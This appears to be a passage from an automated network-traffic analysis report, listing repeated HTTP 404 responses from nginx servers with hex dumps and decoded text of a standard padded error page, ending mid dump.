                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:10 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:20 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:20 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:24:27 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:24:43 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:25:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:25:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 